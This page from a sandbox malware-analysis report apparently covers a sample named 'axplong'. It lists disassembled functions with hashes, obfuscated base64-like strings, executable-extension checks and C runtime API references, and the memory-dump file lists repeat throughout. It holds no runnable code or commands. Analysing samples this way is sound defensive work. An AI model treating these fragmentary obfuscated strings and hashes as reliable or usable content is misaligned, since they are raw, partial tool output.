Associated: 00000009.00000002.3814564219.0000000000531000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3822411389.0000000000532000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3826555608.00000000006D5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3826663852.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_210000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91fd7c5ee6755ac05ac451fbc7a777315f08b0f9f784c9001edc59e20f77ff4c
Instruction ID: 705ea1b88880cd47057fcc2622a585edb212676303c2c6314a58e8bc13c983e5
Opcode Fuzzy Hash: 91fd7c5ee6755ac05ac451fbc7a777315f08b0f9f784c9001edc59e20f77ff4c
Instruction Fuzzy Hash: 1D51B07061C3918FC319CF2D851563ABBE1AF95300F484A9EE0DA87692D774DA44CBE2

Function 0025777B Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3813319105.0000000000211000.00000040.00000001.01000000.00000007.sdmp, Offset: 00210000, based on PE: true

Associated: 00000009.00000002.3813192530.0000000000210000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3813319105.0000000000272000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3813601680.0000000000279000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.000000000027B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.00000000004E9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000519000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000523000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000531000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3822411389.0000000000532000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3826555608.00000000006D5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3826663852.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_210000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8738186c2627d8b85931ed20bebd12742bd8b85d23f51df64036d7266dff1fbd
Instruction ID: 094511002a8ec3f0fd9a9b018ca24d0976c0ffdf66e944fbad181cea69bd3a21
Opcode Fuzzy Hash: 8738186c2627d8b85931ed20bebd12742bd8b85d23f51df64036d7266dff1fbd
Instruction Fuzzy Hash: 4421B673F204394B770CC47E8C5727DB6E1C68C541745423AE8A6EA2C1D968D917E2E4

Function 0025765B Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3813319105.0000000000211000.00000040.00000001.01000000.00000007.sdmp, Offset: 00210000, based on PE: true

Associated: 00000009.00000002.3813192530.0000000000210000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3813319105.0000000000272000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3813601680.0000000000279000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.000000000027B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.00000000004E9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000519000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000523000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000531000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3822411389.0000000000532000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3826555608.00000000006D5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3826663852.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_210000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1bfbcedf763ad32f60498126529020686c8d64b5cced275b7b3714c082b72118
Instruction ID: e89cd3aafffc43dec55f11ea4b51dbbaf6c9ab12e78376c05e122ff104a56d62
Opcode Fuzzy Hash: 1bfbcedf763ad32f60498126529020686c8d64b5cced275b7b3714c082b72118
Instruction Fuzzy Hash: BA117323F30C255A675C816D8C172BAA5D6EBD825071F533AD826EB284E9A4DE23D290

Function 00258720 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3813319105.0000000000211000.00000040.00000001.01000000.00000007.sdmp, Offset: 00210000, based on PE: true

Associated: 00000009.00000002.3813192530.0000000000210000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3813319105.0000000000272000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3813601680.0000000000279000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.000000000027B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.00000000004E9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000519000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000523000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000531000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3822411389.0000000000532000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3826555608.00000000006D5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3826663852.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_210000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 0280ab1c39912e8a083eddb177adf129f62e4936c418cb5d8ab148d00091208e
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 49113B7F22014343E6048E2DC8F46B6E795EACD323B3C4375C841AB758EDB2996CDA08

Function 0024645B Relevance: .0, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3813319105.0000000000211000.00000040.00000001.01000000.00000007.sdmp, Offset: 00210000, based on PE: true

Associated: 00000009.00000002.3813192530.0000000000210000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3813319105.0000000000272000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3813601680.0000000000279000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.000000000027B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.00000000004E9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000519000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000523000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000531000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3822411389.0000000000532000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3826555608.00000000006D5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3826663852.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_210000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7e8c5271f1d51585696ba8f56c5be4b9515ca125c65748d50ef362c2928a09c
Instruction ID: 0308878aa81d857aaa78ad914e26fa7c88e4063aa7cd9769081703e6c6050968
Opcode Fuzzy Hash: a7e8c5271f1d51585696ba8f56c5be4b9515ca125c65748d50ef362c2928a09c
Instruction Fuzzy Hash: 44E0EC30191688AADE3A7F24D809A493B5AFF52354F105814F8088A672CB65EDE2DD91

Function 0024A1C2 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3813319105.0000000000211000.00000040.00000001.01000000.00000007.sdmp, Offset: 00210000, based on PE: true

Associated: 00000009.00000002.3813192530.0000000000210000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3813319105.0000000000272000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3813601680.0000000000279000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.000000000027B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.00000000004E9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000519000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000523000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000531000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3822411389.0000000000532000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3826555608.00000000006D5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3826663852.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_210000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction ID: 5bf136002b41f26ee9cdffc94baac22acd47ec27e3411c7fe8edc582d76c58fb
Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction Fuzzy Hash: 20E08C32961228EBCB19DBC8C944D8AF3ECEB48B00F154096F509D3240C2B0DF00CBD0

Function 00222E20 Relevance: 17.9, APIs: 3, Strings: 7, Instructions: 434COMMON

Download Yara Rule

Strings

8KG0fymoFx==, xrefs: 00222EC7
WGt=, xrefs: 002233BA
246122658369, xrefs: 002233D4
invalid stoi argument, xrefs: 0022425A
stoi argument out of range, xrefs: 00224269
HBhr, xrefs: 0022378F
Fz==, xrefs: 0022369E

Memory Dump Source

Source File: 00000009.00000002.3813319105.0000000000211000.00000040.00000001.01000000.00000007.sdmp, Offset: 00210000, based on PE: true

Associated: 00000009.00000002.3813192530.0000000000210000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3813319105.0000000000272000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3813601680.0000000000279000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.000000000027B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.00000000004E9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000519000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000523000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000531000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3822411389.0000000000532000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3826555608.00000000006D5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3826663852.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_210000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID: 246122658369$8KG0fymoFx==$Fz==$HBhr$WGt=$invalid stoi argument$stoi argument out of range
API String ID: 0-2390467879
Opcode ID: a86ea3c578a7edb0b8d98dd5484f05faea1a0dc3451de4b8dc2fb175dd7a8f07
Instruction ID: 09c563857f4de1372c91717bf395fc9de83dd0226378de411f6b3f2b7928c5ab
Opcode Fuzzy Hash: a86ea3c578a7edb0b8d98dd5484f05faea1a0dc3451de4b8dc2fb175dd7a8f07
Instruction Fuzzy Hash: 62021670D24258EFEF14EFA8C849BDE7BB5EF05304F504158E805A7282D7799A94CFA2

Function 00244770 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 148COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 002447A7
___except_validate_context_record.LIBVCRUNTIME ref: 002447AF
_ValidateLocalCookies.LIBCMT ref: 00244838
__IsNonwritableInCurrentImage.LIBCMT ref: 00244863
_ValidateLocalCookies.LIBCMT ref: 002448B8

Strings

csm, xrefs: 0024484D

Memory Dump Source

Source File: 00000009.00000002.3813319105.0000000000211000.00000040.00000001.01000000.00000007.sdmp, Offset: 00210000, based on PE: true

Associated: 00000009.00000002.3813192530.0000000000210000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3813319105.0000000000272000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3813601680.0000000000279000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.000000000027B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.00000000004E9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000519000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000523000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000531000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3822411389.0000000000532000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3826555608.00000000006D5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3826663852.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_210000_axplong.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 891348f1dd3373b1f8633c48e20cdfef26e6f9bd22c064de25c5721f0d5f058c
Instruction ID: f87680a7f3315a3f7706dfb52fe98e40b56d449deb0bf376afd17dc1d80716a4
Opcode Fuzzy Hash: 891348f1dd3373b1f8633c48e20cdfef26e6f9bd22c064de25c5721f0d5f058c
Instruction Fuzzy Hash: 2451D630A202599BCF18EF68DC85BAE7BB5EF45318F148155E8089B352D772EE25CF90

Function 002470C9 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON

Download Yara Rule

APIs

_wcsrchr.LIBVCRUNTIME ref: 0024710B

Strings

.cmd, xrefs: 00247129
.bat, xrefs: 0024713A
.com, xrefs: 0024714B
.exe, xrefs: 00247118

Memory Dump Source

Source File: 00000009.00000002.3813319105.0000000000211000.00000040.00000001.01000000.00000007.sdmp, Offset: 00210000, based on PE: true

Associated: 00000009.00000002.3813192530.0000000000210000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3813319105.0000000000272000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3813601680.0000000000279000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.000000000027B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.00000000004E9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000519000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000523000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000531000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3822411389.0000000000532000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3826555608.00000000006D5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3826663852.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_210000_axplong.jbxd

Yara matches

Similarity

API ID: _wcsrchr
String ID: .bat$.cmd$.com$.exe
API String ID: 1752292252-4019086052
Opcode ID: cc26a71731e87d00752d131a7c36003ecf90878dbc89e9c878c7470f87495bcd
Instruction ID: 17eb614b862c9d17724267f6278951646fca2a98d0ba5a29c7cffbab01d166fb
Opcode Fuzzy Hash: cc26a71731e87d00752d131a7c36003ecf90878dbc89e9c878c7470f87495bcd
Instruction Fuzzy Hash: EB01F93B73861726671D681D9C0263B17989B83BB4B29002BFD6CF73C2EF55EC6245A0

Function 00212E80 Relevance: 7.8, APIs: 5, Instructions: 272COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 00212F1F
__Mtx_unlock.LIBCPMT ref: 00212F8C
__Cnd_broadcast.LIBCPMT ref: 00212FA3
__Mtx_unlock.LIBCPMT ref: 002130B5
__Mtx_unlock.LIBCPMT ref: 0021315B

Memory Dump Source

Source File: 00000009.00000002.3813319105.0000000000211000.00000040.00000001.01000000.00000007.sdmp, Offset: 00210000, based on PE: true

Associated: 00000009.00000002.3813192530.0000000000210000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3813319105.0000000000272000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3813601680.0000000000279000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.000000000027B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.00000000004E9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000519000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000523000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000531000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3822411389.0000000000532000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3826555608.00000000006D5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3826663852.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_210000_axplong.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$Cnd_broadcast
String ID:
API String ID: 32384418-0
Opcode ID: 023d86daee540411cd27ad2b8dc6b61c4e4d0ef80a6add84859809208d4c9ed8
Instruction ID: 2b7af4165afc5e75f3b8e97ed06051bb34a747547e16a6471383ae6129cf454c
Opcode Fuzzy Hash: 023d86daee540411cd27ad2b8dc6b61c4e4d0ef80a6add84859809208d4c9ed8
Instruction Fuzzy Hash: 3BA1F5B0920216EFDB21DFA4D84579AB7F9FF25310F104129E819D7681EB30EA78CB91

Function 00212670 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 207COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00212806
___std_exception_destroy.LIBVCRUNTIME ref: 002128A0

Strings

P#!, xrefs: 002127BE, 00212899
P#!, xrefs: 00212811

Memory Dump Source

Source File: 00000009.00000002.3813319105.0000000000211000.00000040.00000001.01000000.00000007.sdmp, Offset: 00210000, based on PE: true

Associated: 00000009.00000002.3813192530.0000000000210000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3813319105.0000000000272000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3813601680.0000000000279000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.000000000027B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.00000000004E9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000519000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000523000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000531000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3822411389.0000000000532000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3826555608.00000000006D5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3826663852.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_210000_axplong.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy___std_exception_destroy
String ID: P#!$P#!
API String ID: 2970364248-1913402883
Opcode ID: e30814e2f42094ebd61539365123f1713353bd76478ae45bcd8d54508cde52a6
Instruction ID: 8da56fb9e201b9890606bc9fff67e67a7690d5080ab687487dfeef38c89f3692
Opcode Fuzzy Hash: e30814e2f42094ebd61539365123f1713353bd76478ae45bcd8d54508cde52a6
Instruction Fuzzy Hash: DD719071E10208DBDB04CFA8D881BDEFBF5EF59310F14422DE805A7285E774A9A4CBA5

Function 00227870 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 123COMMON

Download Yara Rule

APIs

__Cnd_unregister_at_thread_exit.LIBCPMT ref: 0022795C
__Cnd_destroy_in_situ.LIBCPMT ref: 00227968
__Mtx_destroy_in_situ.LIBCPMT ref: 00227971

Strings

@y", xrefs: 0022794A

Memory Dump Source

Source File: 00000009.00000002.3813319105.0000000000211000.00000040.00000001.01000000.00000007.sdmp, Offset: 00210000, based on PE: true

Associated: 00000009.00000002.3813192530.0000000000210000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3813319105.0000000000272000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3813601680.0000000000279000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.000000000027B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.00000000004E9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000519000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000523000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000531000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3822411389.0000000000532000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3826555608.00000000006D5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3826663852.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_210000_axplong.jbxd

Yara matches

Similarity

API ID: Cnd_destroy_in_situCnd_unregister_at_thread_exitMtx_destroy_in_situ
String ID: @y"
API String ID: 4078500453-2756106121
Opcode ID: 9a757dd5aa789bcc5f7a1541f6e12cffdfdd36f96ae57c11746a298d7c46243e
Instruction ID: 4b155d4531cef86a063338260eba8ee1556038f8ea2ba719221f983658d64b3a
Opcode Fuzzy Hash: 9a757dd5aa789bcc5f7a1541f6e12cffdfdd36f96ae57c11746a298d7c46243e
Instruction Fuzzy Hash: 5D31F6B2928315AFD720DFA4E845B6AB7E8EF15310F10063EE545C7241E771EAA4CBA1

Function 00212AD0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 51COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00212B23

Strings

P#!, xrefs: 00212B18
P#!, xrefs: 00212B2E
This function cannot be called on a default constructed task, xrefs: 00212B03

Memory Dump Source

Source File: 00000009.00000002.3813319105.0000000000211000.00000040.00000001.01000000.00000007.sdmp, Offset: 00210000, based on PE: true

Associated: 00000009.00000002.3813192530.0000000000210000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3813319105.0000000000272000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3813601680.0000000000279000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.000000000027B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.00000000004E9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000519000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000523000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000531000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3822411389.0000000000532000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3826555608.00000000006D5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3826663852.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_210000_axplong.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: P#!$P#!$This function cannot be called on a default constructed task
API String ID: 2659868963-1772579063
Opcode ID: 5f993d0110d62ecada5ef3728a3cebdb03f8ca6ecee20fe064223fceb464f52f
Instruction ID: fc61672489f91a326bc0f6ca7eb695f50d88ff1db2479e6ee5ef013332b0e746
Opcode Fuzzy Hash: 5f993d0110d62ecada5ef3728a3cebdb03f8ca6ecee20fe064223fceb464f52f
Instruction Fuzzy Hash: 18F0967092031CABC714DFA8A84199EF7EDDF15300F5041AEF84997601EB71AAB88B95

Function 0024C9B0 Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 0024CA37

Memory Dump Source

Source File: 00000009.00000002.3813319105.0000000000211000.00000040.00000001.01000000.00000007.sdmp, Offset: 00210000, based on PE: true

Associated: 00000009.00000002.3813192530.0000000000210000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3813319105.0000000000272000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3813601680.0000000000279000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.000000000027B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.00000000004E9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000519000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000523000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000531000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3822411389.0000000000532000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3826555608.00000000006D5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3826663852.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_210000_axplong.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 7941c91dc3c81985f55d5af0d0e5d35b4c2fcc41726f6f06d2574da038ee3747
Instruction ID: 32aaf21810cbb808b6c826b9f1cbd0ea7001f91ff5fa67794cd10e9cd2ff303f
Opcode Fuzzy Hash: 7941c91dc3c81985f55d5af0d0e5d35b4c2fcc41726f6f06d2574da038ee3747
Instruction Fuzzy Hash: 72B15832A222569FDB19CF2CC8817BEBBE5EF55340F3481AAD845EB341D6748D51CB60

Function 0022BAA2 Relevance: 6.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 0022BAFA
__Xtime_diff_to_millis2.LIBCPMT ref: 0022BB14
_xtime_get.LIBCPMT ref: 0022BB37
__Xtime_diff_to_millis2.LIBCPMT ref: 0022BB43

